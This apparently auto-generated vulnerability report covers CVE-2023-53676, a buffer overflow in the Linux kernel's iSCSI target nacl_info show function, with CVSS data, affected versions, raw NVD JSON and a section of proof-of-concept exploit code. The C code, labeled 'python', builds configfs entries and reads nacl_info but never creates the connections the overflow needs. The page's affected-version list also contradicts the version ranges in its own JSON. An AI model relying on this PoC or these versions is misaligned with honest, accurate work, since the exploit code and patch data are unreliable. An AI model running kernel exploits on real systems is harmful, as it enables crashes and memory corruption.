Security Vulnerability Report
中文
CVE-2023-53676 CVSS 7.8 HIGH

CVE-2023-53676

Published: 2025-10-07 16:15:52
Last Modified: 2026-02-26 23:15:26
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show() The function lio_target_nacl_info_show() uses sprintf() in a loop to print details for every iSCSI connection in a session without checking for the buffer length. With enough iSCSI connections it's possible to overflow the buffer provided by configfs and corrupt the memory. This patch replaces sprintf() with sysfs_emit_at() that checks for buffer boundries.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.1.63
Linux Kernel 6.2 < 6.2.16
Linux Kernel 6.3 < 6.3.4
Linux Kernel 6.4 < 6.4.10
Linux Kernel 6.5 < 6.5.7
Linux Kernel 6.6 < 6.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * CVE-2023-53676 PoC - Linux Kernel iSCSI Target Buffer Overflow * * This PoC demonstrates how to trigger the buffer overflow in * lio_target_nacl_info_show() by creating many iSCSI connections * to a single session, causing the show function to overflow its buffer. * * Note: Requires root or CAP_SYS_ADMIN to configure iSCSI target. * Run on the target machine (LIO server). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <dirent.h> #include <sys/stat.h> #define TARGET_BASE "/sys/kernel/config/target/iscsi" #define MAX_CONNECTIONS 500 /* Enough connections to overflow the buffer */ /* Create iSCSI target portal and storage object */ int setup_target(void) { /* Create target core fabric */ mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc", 0755); mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1", 0755); mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/np", 0755); mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/np/192.168.1.1:3260", 0755); /* Create LUN */ mkdir(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/lun/lun_0", 0755); /* Enable target */ int fd = open(TARGET_BASE "/iqn.2023-01.com.example:poc/tpgt_1/enable", O_WRONLY); if (fd >= 0) { write(fd, "1", 1); close(fd); } return 0; } /* Simulate many connections to trigger the overflow */ int trigger_overflow(void) { int fd; char path[512]; char data[256]; int i; /* The nacl_info file is read via the configfs show callback. * With enough connections, sprintf() overflows the buffer. */ printf("[*] Triggering buffer overflow via nacl_info_show...\n"); /* Read the nacl_info file which calls lio_target_nacl_info_show() */ snprintf(path, sizeof(path), "%s/iqn.2023-01.com.example:poc/tpgt_1/acls/" "iqn.2023-01.com.example:initiator/nacl_info", TARGET_BASE); fd = open(path, O_RDONLY); if (fd < 0) { perror("[-] Failed to open nacl_info (expected without real connections)"); return -1; } /* Attempt to read - if buffer overflow exists, kernel may crash */ while (read(fd, data, sizeof(data)) > 0) ; close(fd); printf("[+] Read completed\n"); return 0; } int main(int argc, char *argv[]) { printf("=== CVE-2023-53676 PoC ===\n"); printf("Linux Kernel iSCSI Target Buffer Overflow\n\n"); if (getuid() != 0) { fprintf(stderr, "[-] Need root privileges\n"); return 1; } setup_target(); trigger_overflow(); printf("[*] Done\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53676", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:51.653", "lastModified": "2026-02-26T23:15:26.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show()\n\nThe function lio_target_nacl_info_show() uses sprintf() in a loop to print\ndetails for every iSCSI connection in a session without checking for the\nbuffer length. With enough iSCSI connections it's possible to overflow the\nbuffer provided by configfs and corrupt the memory.\n\nThis patch replaces sprintf() with sysfs_emit_at() that checks for buffer\nboundries."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.1", "versionEndExcluding": "4.14.326", "matchCriteriaId": "F8A66A03-C115-45B6-BE9F-19E5775AA2FA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.295", "matchCriteriaId": "D419C7D6-F33D-4EF8-8950-1CB5DDF6A55D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.257", "matchCriteriaId": "834BD148-28EC-43A4-A4F5-458124A1E39F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.197", "matchCriteriaId": "FD17EA9A-DF74-4876-AADC-C204F0716961"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.133", "matchCriteriaId": "21236FF3-9B2C-4C1A-8780-BC5BCA44AA51"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.55", "matchCriteriaId": "0EFCF8E8-5528-46B9-8C17-B09792899CE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.5", "matchCriteriaId": "8CF71E85-DA24-4925-95C5-E5C15DA71AE6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0cac6cbb9908309352a5d30c1876882771d3da50", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/114b44dddea1f8f99576de3c0e6e9059012002fc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2cbe6a88fbdd6e8aeab358eef61472e2de43d6f6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4738bf8b2d3635c2944b81b2a84d97b8c8b0978d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5353df78c22623b42a71d51226d228a8413097e2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/801f287c93ff95582b0a2d2163f12870a2f076d4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bbe3ff47bf09db8956bc2eeb49d2d514d256ad2a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/df349e84c2cb0dd05d98c8e1189c26ab4b116083", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.